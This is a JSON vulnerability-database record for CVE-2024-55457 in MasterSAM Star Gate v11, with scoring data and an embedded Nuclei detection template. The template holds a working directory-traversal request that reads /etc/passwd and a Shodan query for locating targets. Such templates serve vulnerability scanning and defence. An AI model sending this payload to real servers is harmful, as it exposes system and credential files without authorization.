{"_links":{"capec":{"href":"/api/v1/vulnerability/cve-2024-55457/capec"},"cvss":{"href":"/api/v1/vulnerability/cve-2024-55457/cvss"},"cwe":{"href":"/api/v1/vulnerability/cve-2024-55457/cwe"},"enrichment":{"href":"/api/v1/vulnerability/cve-2024-55457/enrichment"},"gcve":{"href":"/api/v1/vulnerability/cve-2024-55457/gcve"},"self":{"href":"/api/v1/vulnerability/cve-2024-55457"},"sightings":{"href":"/api/v1/sightings/cve-2024-55457"}},"enrichments":{"cisa-kev":{"kev":false},"epss":{"epss":0.0312,"kev":false,"percentile":0.87281},"nuclei":{"nuclei":true,"nuclei_template":"http/cves/2024/CVE-2024-55457.yaml","nuclei_template_severity":"high","nuclei_template_yaml":"id: CVE-2024-55457\n\ninfo:\n  name: MasterSAM Star Gate v11 - Local File Inclusion\n  author: DhiyaneshDK\n  severity: high\n  description: |\n    MasterSAM Star Gate v11 is vulnerable to a directory traversal attack via the endpoint /adama/adama/downloadService. An attacker can exploit this vulnerability by manipulating the file parameter to access arbitrary files on the server, potentially leading to the exposure of sensitive information.\n  impact: |\n    Unauthenticated attackers can exploit directory traversal to read arbitrary files from the server, potentially exposing sensitive configuration data, credentials, and system files.\n  remediation: |\n    Contact MasterSAM for a patched version of Star Gate v11 that addresses the directory traversal vulnerability.\n  reference:\n    - https://github.com/h13nh04ng/CVE-2024-55457-PoC\n    - https://x.com/cyber_advising/status/1876034270852231257\n  classification:\n    cve-id: CVE-2024-55457\n    cwe-id: CWE-22\n    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N\n    cvss-score: 6.5\n    epss-score: 0.0312\n    epss-percentile: 0.87281\n  metadata:\n    verified: true\n    max-request: 1\n    shodan-query: html:\"MasterSAM\"\n  tags: cve,cve2024,lfi,mastersam,v11,adama,vkev,vuln\n\nhttp:\n  - method: GET\n    path:\n      - \"{{BaseURL}}/adama/adama/downloadService?type=1&file=../../../../etc/passwd\"\n\n    matchers:\n      - type: dsl\n        dsl:\n          - \"contains_all(header, 'application/octet-stream', 'filename=')\"\n          - \"regex('root:.*:0:0:', body)\"\n          - \"status_code == 200\"\n        condition: and\n# digest: 490a00463044022045318ba000550bc651e0c12fd750fa91c819ecb5f4b586f22727059d103b05e102207867ce1f6d995b5a56a18dfe73403daf32351362e2fa451c9b15870e3b9c0923:922c64590222798bb761d5b6d8e72950"}},"vuln_id":"cve-2024-55457"}